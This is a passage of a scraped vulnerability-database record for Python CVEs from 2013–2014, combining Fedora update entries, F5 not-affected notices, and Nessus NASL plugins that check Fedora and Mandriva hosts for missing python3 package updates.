python-2.7.5-13.fc20", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4650"], "description": "Python is an interpreted, interactive, object-oriented programming language often compared to Tcl, Perl, Scheme or Java. Python includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and MFC). Programmers can write new built-in modules for Python in C or C++. Python can be used as an extension language for applications that need a programmable interface. 
Note that documentation for Python is provided in the python-docs package. This package provides the \"python\" executable; most of the actual implementation is within the \"python-libs\" package. ", "modified": "2014-11-09T15:47:21", "published": "2014-11-09T15:47:21", "id": "FEDORA:2827460D7732", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: python-2.7.5-15.fc20", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Python 3 is a new version of the language that is incompatible with the 2.x line of releases. The language is mostly the same, but many details, especi ally how built-in objects like dictionaries and strings work, have changed considerably, and a lot of deprecated features have finally been removed. ", "modified": "2013-11-26T04:01:31", "published": "2013-11-26T04:01:31", "id": "FEDORA:88F7421515", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: python3-3.3.2-8.fc19", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "f5": [{"lastseen": "2017-10-12T02:11:08", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238", "CVE-2009-2408"], "edition": 1, "description": " \n\n\nThe ssl.match_hostname function in the SSL module in Python 2.6 through 3.4 does not properly handle a '\\0' character in a domain name in the Subject Alternative Name field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408. ([CVE-2013-4238](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238>)) \n\n\nImpact \n\n\nNone. No F5 products are affected by this vulnerability. 
\n\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents.](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "modified": "2016-01-09T02:20:00", "published": "2014-09-29T23:41:00", "href": "https://support.f5.com/csp/article/K15638", "id": "F5:K15638", "title": "Python vulnerability CVE-2013-4238", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-11-09T00:09:51", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238", "CVE-2009-2408"], "edition": 1, "description": "Recommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "modified": "2014-10-17T00:00:00", "published": "2014-09-29T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15638.html", "id": "SOL15638", "title": "SOL15638 - Python vulnerability CVE-2013-4238", "type": "f5", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-22T00:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2014-1912", "CVE-2014-4650"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your 
release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.1 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 
- 2.2.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n", "edition": 1, "modified": "2017-07-21T22:49:00", "published": "2017-07-21T22:49:00", "href": "https://support.f5.com/csp/article/K93278412", "id": "F5:K93278412", "title": "Python and Jython vulnerabilities CVE-2014-1912 and CVE-2014-4650", "type": "f5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-12T10:12:14", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-10T00:00:00", "title": "Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-10T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-14245.NASL", "href": "https://www.tenable.com/plugins/nessus/79076", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14245.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79076);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14245\");\n\n script_name(english:\"Fedora 20 : python3-3.3.2-18.fc20 (2014-14245)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/142831.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6d288d8e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"python3-3.3.2-18.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:12:14", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-14T00:00:00", "title": "Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-14257.NASL", "href": "https://www.tenable.com/plugins/nessus/79238", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14257.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79238);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14257\");\n\n script_name(english:\"Fedora 19 : python3-3.3.2-10.fc19 (2014-14257)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143576.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3b06ef1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"python3-3.3.2-10.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-12T10:12:13", "description": "Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 16, "cvss3": {"score": 5.9, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2014-11-11T00:00:00", "title": "Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4616", "CVE-2014-4650"], "modified": "2014-11-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:python3", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2014-14208.NASL", "href": "https://www.tenable.com/plugins/nessus/79095", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-14208.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79095);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-4616\");\n script_bugtraq_id(68119);\n script_xref(name:\"FEDORA\", value:\"2014-14208\");\n\n script_name(english:\"Fedora 21 : python3-3.4.1-16.fc21 (2014-14208)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix for CVE-2014-4650: CGIHTTPServer module does not properly handle\nURL-encoded path separators in URLs. Fix for CVE-2014-4650\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1112285\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/143191.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bb72edb4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected python3 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/11\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"python3-3.4.1-16.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python3\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-01-07T11:55:01", "description": "Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. 
This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython is susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used as an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).", "edition": 27, "published": "2015-03-30T00:00:00", "title": "Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-4616", "CVE-2014-4650"], "modified": "2015-03-30T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:tkinter3-apps", "p-cpe:/a:mandriva:linux:python3-docs", "p-cpe:/a:mandriva:linux:lib64python3-devel", "cpe:/o:mandriva:business_server:2", "p-cpe:/a:mandriva:linux:lib64python3.3", "p-cpe:/a:mandriva:linux:python3", "p-cpe:/a:mandriva:linux:tkinter3"], "id": "MANDRIVA_MDVSA-2015-076.NASL", "href": "https://www.tenable.com/plugins/nessus/82329", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2015:076. 
\n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(82329);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-4650\");\n script_xref(name:\"MDVSA\", value:\"2015:076\");\n\n script_name(english:\"Mandriva Linux Security Advisory : python3 (MDVSA-2015:076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated python3 packages fix security vulnerabilities :\n\nZipExtFile.read goes into 100% CPU infinite loop on maliciously binary\nedited zips (CVE-2013-7338).\n\nA vulnerability was reported in Python's socket module, due to a\nboundary error within the sock_recvfrom_into() function, which could\nbe exploited to cause a buffer overflow. This could be used to crash a\nPython application that uses the socket.recvfrom_info() function or,\npossibly, execute arbitrary code with the permissions of the user\nrunning vulnerable Python code (CVE-2014-1912).\n\nIt was reported that a patch added to Python 3.2 caused a race\ncondition where a file created could be created with world read/write\npermissions instead of the permissions dictated by the original umask\nof the process. This could allow a local attacker that could win the\nrace to view and edit files created by a program using this call. 
Note\nthat prior versions of Python, including 2.x, do not include the\nvulnerable _get_masked_mode() function that is used by os.makedirs()\nwhen exist_ok is set to True (CVE-2014-2667).\n\nPython are susceptible to arbitrary process memory reading by a user\nor adversary due to a bug in the _json module caused by insufficient\nbounds checking. The bug is caused by allowing the user to supply a\nnegative value that is used an an array index, causing the scanstring\nfunction to access process memory outside of the string it is intended\nto access (CVE-2014-4616).\n\nThe CGIHTTPServer Python module does not properly handle URL-encoded\npath separators in URLs. This may enable attackers to disclose a CGI\nscript's source code or execute arbitrary scripts in the server's\ndocument root (CVE-2014-4650).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0085.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0140.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0216.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0285.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64python3.3\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:mandriva:linux:python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:python3-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tkinter3-apps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 